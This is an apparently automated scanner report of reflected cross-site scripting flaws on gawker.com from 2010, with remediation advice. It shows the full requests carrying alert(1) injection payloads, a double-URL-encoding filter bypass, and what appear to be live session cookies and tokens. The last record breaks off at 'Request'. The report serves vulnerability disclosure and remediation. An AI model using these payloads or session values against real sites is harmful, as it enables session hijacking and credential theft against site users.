Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c4f"-alert(1)-"f267c21d01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710624/the-10-most-depressing-jobs-in-america66c4f"-alert(1)-"f267c21d01 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:42 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:42 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:42 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:13 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=85573 at t=1292286403040038 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=9957 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 86780
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a55db"-alert(1)-"56888db2edc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710674/dont-ask-dont-tell-repeal-is-deada55db"-alert(1)-"56888db2edc HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:11 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=79603 at t=1292286401913583 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=9991 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 88150
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acdbf"-alert(1)-"012a2e8d709 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710961/ivy-league-professor-charged-with-incestacdbf"-alert(1)-"012a2e8d709 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:08 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=59011 at t=1292286398116300 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=10000 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 87761
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830a6"-alert(1)-"aa92c82cf08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5711335/real-housewives-of-beverly-hills--the-chicken-fight830a6"-alert(1)-"aa92c82cf08 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:58 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:57 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:57 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:57 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:28 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=56701 at t=1292286418006467 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=10000 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 97622
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edece"-alert(1)-"fcd4bad0ccd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5711497/gawker-dating-a-few-tips-to-help-you-search-for-loveedece"-alert(1)-"fcd4bad0ccd HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:40 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:11 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=62053 at t=1292286401803482 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=9974 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 84414
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d3f"-alert(1)-"a7deb0c4f20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5712623/julian-assange-boasted-about-asian-teengirl-stalkers-in-online-dating-profilef3d3f"-alert(1)-"a7deb0c4f20 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:40 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:39 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:39 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:39 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:10 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=65815 at t=1292286400753046 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=9973 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 85673
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2cc6"-alert(1)-"c6d63986c37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5713056/gawker-security-breach-were-here-to-helpb2cc6"-alert(1)-"c6d63986c37 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
Response
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:26:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/ Set-Cookie: GANJAVIEW=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/; domain=.gawker.com Set-Cookie: GANJAUSERSETTINGS=deleted; expires=Mon, 14-Dec-2009 00:26:37 GMT; path=/ Set-Cookie: GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; path=/; domain=.gawker.com Cache-Control: max-age=30 Expires: Tue, 14 Dec 2010 00:27:08 GMT P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" GawkerApplicationHost: PEST-45 GawkerHost: GM49 - Request took D=63249 at t=1292286398748768 on site gawker.com (live) GawkerApplication: ganja Keep-Alive: timeout=300, max=9989 Connection: Keep-Alive Content-Type: text/html; charset=utf-8; Content-Length: 88288
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c59d"-alert(1)-"071527436dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/votes6c59d"-alert(1)-"071527436dc/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85a29%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5c37109db2 was submitted in the REST URL parameter 2. This input was echoed as 85a29"><script>alert(1)</script>b5c37109db2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
